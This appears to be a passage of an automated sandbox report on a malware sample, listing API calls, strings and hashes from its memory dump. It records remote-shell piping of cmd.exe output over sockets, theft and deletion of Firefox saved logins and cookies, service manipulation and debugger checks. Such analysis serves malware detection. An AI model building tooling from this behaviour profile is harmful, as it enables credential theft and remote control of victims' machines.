                                          • Instruction Fuzzy Hash: BD3292716183015BC608F776C8569AF77A9AF91348F40093FF942671E3EF389A09C69B
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • __Init_thread_footer.LIBCMT ref: 0040563C
                                            • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                                          • __Init_thread_footer.LIBCMT ref: 00405679
                                          • CreatePipe.KERNEL32(0046DCE4,0046DCCC,0046DC08,00000000,0045F6D4,00000000), ref: 00405704
                                          • CreatePipe.KERNEL32(0046DCD0,0046DCEC,0046DC08,00000000), ref: 0040571A
                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0046DC18,0046DCD4), ref: 0040578D
                                          • Sleep.KERNEL32(0000012C,00000093,?), ref: 004057F4
                                          • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040581C
                                          • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405845
                                            • Part of subcall function 0042F49E: __onexit.LIBCMT ref: 0042F4A4
                                          • WriteFile.KERNEL32(00000000,00000000,?,00000000,0046C2D0,0045F6D8,00000062,0045F6BC), ref: 00405932
                                          • Sleep.KERNEL32(00000064,00000062,0045F6BC), ref: 0040594B
                                          • TerminateProcess.KERNEL32(00000000), ref: 00405964
                                          • CloseHandle.KERNEL32 ref: 00405970
                                          • CloseHandle.KERNEL32 ref: 0040597C
                                          • CloseHandle.KERNEL32 ref: 00405992
                                          • CloseHandle.KERNEL32 ref: 0040599E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                          • String ID: SystemDrive$cmd.exe
                                          • API String ID: 2994406822-3633465311
                                          • Opcode ID: a42ed005172c4764f8bd6619dc74f8f2985c3de3d202e710ebc583925a73323b
                                          • Instruction ID: 55ed603c712564892f9c2332be2a793e9955a409e8b955cd36c8b06ecb557e64
                                          • Opcode Fuzzy Hash: a42ed005172c4764f8bd6619dc74f8f2985c3de3d202e710ebc583925a73323b
                                          • Instruction Fuzzy Hash: E591D671F00208ABCB05BB659D4696F3A69EB44304B10407FF905B72E2EBF84D05DB5E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040A091
                                          • FindClose.KERNEL32(00000000), ref: 0040A0AB
                                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040A1E2
                                          • FindClose.KERNEL32(00000000), ref: 0040A208
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Find$CloseFile$FirstNext
                                          • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                          • API String ID: 1164774033-3681987949
                                          • Opcode ID: 7211f678bce55bba0cd1d63af98ad6c2c4189c5a55d84edd23214396f15f50ab
                                          • Instruction ID: f2c277aebdcb09342038ebf6bf1e841689b7d3b7dff34d34010c96f776921475
                                          • Opcode Fuzzy Hash: 7211f678bce55bba0cd1d63af98ad6c2c4189c5a55d84edd23214396f15f50ab
                                          • Instruction Fuzzy Hash: B451943091025A5BCB14FB71DD569EEB774AF11305F4001BFF806B60E2EF785A89CA5A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040A2A5
                                          • FindClose.KERNEL32(00000000), ref: 0040A2BB
                                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040A2E5
                                          • DeleteFileA.KERNEL32(00000000,00000000), ref: 0040A38D
                                          • GetLastError.KERNEL32 ref: 0040A397
                                          • FindNextFileA.KERNEL32(00000000,00000010), ref: 0040A3AB
                                          • FindClose.KERNEL32(00000000), ref: 0040A3D1
                                          • FindClose.KERNEL32(00000000), ref: 0040A3F2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Find$File$Close$Next$DeleteErrorFirstLast
                                          • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                          • API String ID: 532992503-432212279
                                          • Opcode ID: a869c801c1e13f68448cdbd77196949946ba1128e16313e5d789613cf0112277
                                          • Instruction ID: 2e8bce256a7dd72f22d157e061cccd6386a79eba79b63e076e2be11f32c05444
                                          • Opcode Fuzzy Hash: a869c801c1e13f68448cdbd77196949946ba1128e16313e5d789613cf0112277
                                          • Instruction Fuzzy Hash: 5441B2309003195BCB14FBA5DC569EE7778AF11305F40017FF806B61D2EF385A99CA9A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,?,0046BACC,0046C998), ref: 004160F2
                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,00415BDC,?), ref: 00416139
                                          • GetLastError.KERNEL32(?,0046BACC,0046C998), ref: 00416147
                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,00415BDC,?), ref: 00416178
                                          • OpenServiceW.ADVAPI32(00000000,?,00000001,00000000,004659C4,00000000,004659C4,00000000,004659C4,?,0046BACC,0046C998), ref: 00416248
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: EnumOpenServicesStatus$ErrorLastManagerService
                                          • String ID:
                                          • API String ID: 2247270020-0
                                          • Opcode ID: 3a0335570ce1dd26f858331b256eec3d42cee765c1be6f22b815ec7b4d0d11c2
                                          • Instruction ID: 68473e94775990671fd8c6040cdbc231cd1f0957a3a8cd51887978b0f5e9c903
                                          • Opcode Fuzzy Hash: 3a0335570ce1dd26f858331b256eec3d42cee765c1be6f22b815ec7b4d0d11c2
                                          • Instruction Fuzzy Hash: 7B814D71D00209AACB14EBA1DC929EEB739EF14345F10406EF916761D2EF386A09CB98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?,?,0046C518,00000001), ref: 004177EB
                                          • FindNextFileW.KERNEL32(00000000,?,?,0046C518,00000001), ref: 00417822
                                          • RemoveDirectoryW.KERNEL32(?,?,0046C518,00000001), ref: 0041789C
                                          • FindClose.KERNEL32(00000000,?,0046C518,00000001), ref: 004178CA
                                          • RemoveDirectoryW.KERNEL32(0046C518,?,0046C518,00000001), ref: 004178D3
                                          • SetFileAttributesW.KERNEL32(?,00000080,?,0046C518,00000001), ref: 004178F0
                                          • DeleteFileW.KERNEL32(?,?,0046C518,00000001), ref: 004178FD
                                          • GetLastError.KERNEL32(?,0046C518,00000001), ref: 00417925
                                          • FindClose.KERNEL32(00000000,?,0046C518,00000001), ref: 00417938
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                          • String ID:
                                          • API String ID: 2341273852-0
                                          • Opcode ID: a2017bcb7b032fc72568f7b298dad3f7503c270b7714985d0920de0a3b4697ef
                                          • Instruction ID: 6da704504b35dc0d8a2ea9a1e9b01ebd60215a2eebb254005b65f5ca46bb9893
                                          • Opcode Fuzzy Hash: a2017bcb7b032fc72568f7b298dad3f7503c270b7714985d0920de0a3b4697ef
                                          • Instruction Fuzzy Hash: 8051273450421A8ACF24EF78C8886FAB774FF54305F5041EAE84993251FB359ECACB98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,?,00416033,00000000), ref: 004163B9
                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,00416033,00000000), ref: 004163CD
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,00416033,00000000), ref: 004163DA
                                          • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,00416033,00000000), ref: 004163E5
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,00416033,00000000), ref: 004163F7
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,00416033,00000000), ref: 004163FA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Service$CloseHandle$Open$ManagerStart
                                          • String ID: 3`A
                                          • API String ID: 276877138-3175782522
                                          • Opcode ID: b01b844c620f2adba2967bf90f13e31907c9191db02da24ff555517433b69a50
                                          • Instruction ID: 62d5a2aa0acc4a9a23ffe864dccd2203370fbef9b686cd9ab08c2db04e146924
                                          • Opcode Fuzzy Hash: b01b844c620f2adba2967bf90f13e31907c9191db02da24ff555517433b69a50
                                          • Instruction Fuzzy Hash: 18F090311413187FD2116F659C88DBF3B6CDA41BE6B00002AF80592192CE68CE85A5B9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004112DA
                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004112E6
                                            • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                                          • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004115C7
                                          • GetProcAddress.KERNEL32(00000000), ref: 004115CE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: AddressCloseCreateLibraryLoadProcsend
                                          • String ID: SHDeleteKeyW$Shlwapi.dll
                                          • API String ID: 2127411465-314212984
                                          • Opcode ID: 1a88d3fd99e274eabcc1c03e38d22ca0b4a7199f0b75f731fd90d8c07347ad56
                                          • Instruction ID: 42533e532c22dbc36938cc4a5415c4332dc933708f84597f9d810698dd7565cc
                                          • Opcode Fuzzy Hash: 1a88d3fd99e274eabcc1c03e38d22ca0b4a7199f0b75f731fd90d8c07347ad56
                                          • Instruction Fuzzy Hash: B4E1D171A043005BCA14B7B6CC5B9BF76A95B95708F40052FFA42B71F3EE7C8948869A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 00413965
                                          • OpenProcessToken.ADVAPI32(00000000), ref: 0041396C
                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0041397E
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0041399D
                                          • GetLastError.KERNEL32 ref: 004139A3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                          • String ID: SeShutdownPrivilege
                                          • API String ID: 3534403312-3733053543
                                          • Opcode ID: 94602a98415b27b9a6c2aabf7476c335bfb2bc105e34b2d46e9cbd2c65603840
                                          • Instruction ID: fcc62124dca6382e8ff7f462a1d037d759b9923c43a5f98482535144c24e2b82
                                          • Opcode Fuzzy Hash: 94602a98415b27b9a6c2aabf7476c335bfb2bc105e34b2d46e9cbd2c65603840
                                          • Instruction Fuzzy Hash: 44F03A71902229ABDB10AFA0ED0DAEFBF7CEF05652F100064B805A1056E6348B14CAB5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: __floor_pentium4
                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                          • API String ID: 4168288129-2761157908
                                          • Opcode ID: 42261130ad1b2c87b12dda9ae586fc566389ec3ff41f756cf8e7a1c957aab040
                                          • Instruction ID: bf911c1a37dbfafd62c1db5ad45da0714cb81aa7e36eaf23024dd27f54a8ec40
                                          • Opcode Fuzzy Hash: 42261130ad1b2c87b12dda9ae586fc566389ec3ff41f756cf8e7a1c957aab040
                                          • Instruction Fuzzy Hash: D2C24872E086288FEB25CE299D407EAB7B5FB44305F1541EBD80DE7240E778AE818F45
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • __EH_prolog.LIBCMT ref: 004077F1
                                            • Part of subcall function 00404A08: connect.WS2_32(?,?,00000010), ref: 00404A23
                                            • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040789E
                                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 004078FC
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00407954
                                          • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040796B
                                            • Part of subcall function 00404E0B: closesocket.WS2_32(?), ref: 00404E11
                                          • FindClose.KERNEL32(00000000), ref: 00407BA9
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Find$CloseFile$Exception@8FirstH_prologNextThrowclosesocketconnectsend
                                          • String ID:
                                          • API String ID: 2104358809-0
                                          • Opcode ID: 6e1c50ec99e47cdf401a26aa3eae8f72bc235e77bfa98b3cfde53def79053942
                                          • Instruction ID: c2b305b608749dbe3c980790889d4cdccc335bbb97c8ab2c1357a9fa12a4aca1
                                          • Opcode Fuzzy Hash: 6e1c50ec99e47cdf401a26aa3eae8f72bc235e77bfa98b3cfde53def79053942
                                          • Instruction Fuzzy Hash: DAC170729041099ADB14FB61CD52AEE7375AF10318F10417FE906B71D2EF386B49CB99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0044A9DB,?,00000000), ref: 0044A755
                                          • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0044A9DB,?,00000000), ref: 0044A77E
                                          • GetACP.KERNEL32(?,?,0044A9DB,?,00000000), ref: 0044A793
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID: ACP$OCP
                                          • API String ID: 2299586839-711371036
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
                                            • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
                                            • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
                                            • Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60
                                            • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D41
                                            • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D4E
                                          • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0044A99C
                                          • IsValidCodePage.KERNEL32(00000000), ref: 0044A9F7
                                          • IsValidLocale.KERNEL32(?,00000001), ref: 0044AA06
                                          • GetLocaleInfoW.KERNEL32(?,00001001,0043E2C1,00000040,?,0043E3E1,00000055,00000000,?,?,00000055,00000000), ref: 0044AA4E
                                          • GetLocaleInfoW.KERNEL32(?,00001002,0043E341,00000040), ref: 0044AA6D
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                          • String ID:
                                          • API String ID: 745075371-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00417614: GetCurrentProcess.KERNEL32(?,?,?,004180D1,WinDir,00000000,00000000), ref: 00417625
                                            • Part of subcall function 00417614: IsWow64Process.KERNEL32(00000000,?,?,004180D1,WinDir,00000000,00000000), ref: 0041762C
                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 0040D231
                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0040D253
                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040D3DA
                                          • CloseHandle.KERNEL32(00000000), ref: 0040D3E9
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ProcessProcess32$CloseCreateCurrentFirstHandleNextSnapshotToolhelp32Wow64
                                          • String ID:
                                          • API String ID: 715332099-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
                                            • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
                                            • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
                                            • Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60
                                            • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D41
                                            • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D4E
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044A397
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044A3E8
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044A4A8
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorInfoLastLocale$_free$_abort
                                          • String ID:
                                          • API String ID: 2829624132-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • IsDebuggerPresent.KERNEL32 ref: 0043688B
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00436895
                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 004368A2
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                          • String ID:
                                          • API String ID: 3906539128-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0043DD1F,?,00000004), ref: 0044240D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID: GetLocaleInfoEx
                                          • API String ID: 2299586839-2904428671
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FindFirstFileW.KERNEL32(00000000,?), ref: 0041564B
                                          • FindNextFileW.KERNEL32(00000000,?,?), ref: 00415717
                                            • Part of subcall function 00407514: char_traits.LIBCPMT ref: 0040752F
                                            • Part of subcall function 004179DC: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,00000000,00000000,?,004136FE), ref: 004179F9
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: File$Find$CreateFirstNextchar_traits
                                          • String ID:
                                          • API String ID: 3100282071-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FindFirstFileW.KERNEL32(00000000,?,?,0046C238), ref: 004061DE
                                          • FindNextFileW.KERNEL32(00000000,?,?), ref: 0040629E
                                            • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FileFind$FirstNextsend
                                          • String ID:
                                          • API String ID: 4113138495-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: 0$>B
                                          • API String ID: 0-1048847329
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0044B5A6,?,?,00000008,?,?,0044FE0D,00000000), ref: 0044B7D8
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionRaise
                                          • String ID:
                                          • API String ID: 3997070919-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: L/B
                                          • API String ID: 0-202356071
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
                                            • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
                                            • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
                                            • Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60
                                            • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D41
                                            • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D4E
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044A5E7
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$_free$InfoLocale_abort
                                          • String ID:
                                          • API String ID: 1663032902-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
                                            • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
                                            • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
                                            • Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60
                                          • EnumSystemLocalesW.KERNEL32(0044A343,00000001,00000000,?,0043E2C1,?,0044A970,00000000,?,?,?), ref: 0044A28D
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                          • String ID:
                                          • API String ID: 1084509184-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
                                            • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
                                            • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
                                            • Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60
                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0044A561,00000000,00000000,?), ref: 0044A7EF
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$InfoLocale_abort_free
                                          • String ID:
                                          • API String ID: 2692324296-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
                                            • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
                                            • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
                                            • Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60
                                          • EnumSystemLocalesW.KERNEL32(0044A593,00000001,?,?,0043E2C1,?,0044A934,0043E2C1,?,?,?,?,?,0043E2C1,?,?), ref: 0044A302
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                          • String ID:
                                          • API String ID: 1084509184-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
                                            • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
                                            • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
                                            • Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60
                                          • EnumSystemLocalesW.KERNEL32(0044A127,00000001,?,?,?,0044A992,0043E2C1,?,?,?,?,?,0043E2C1,?,?,?), ref: 0044A207
                                          Memory Dump Source
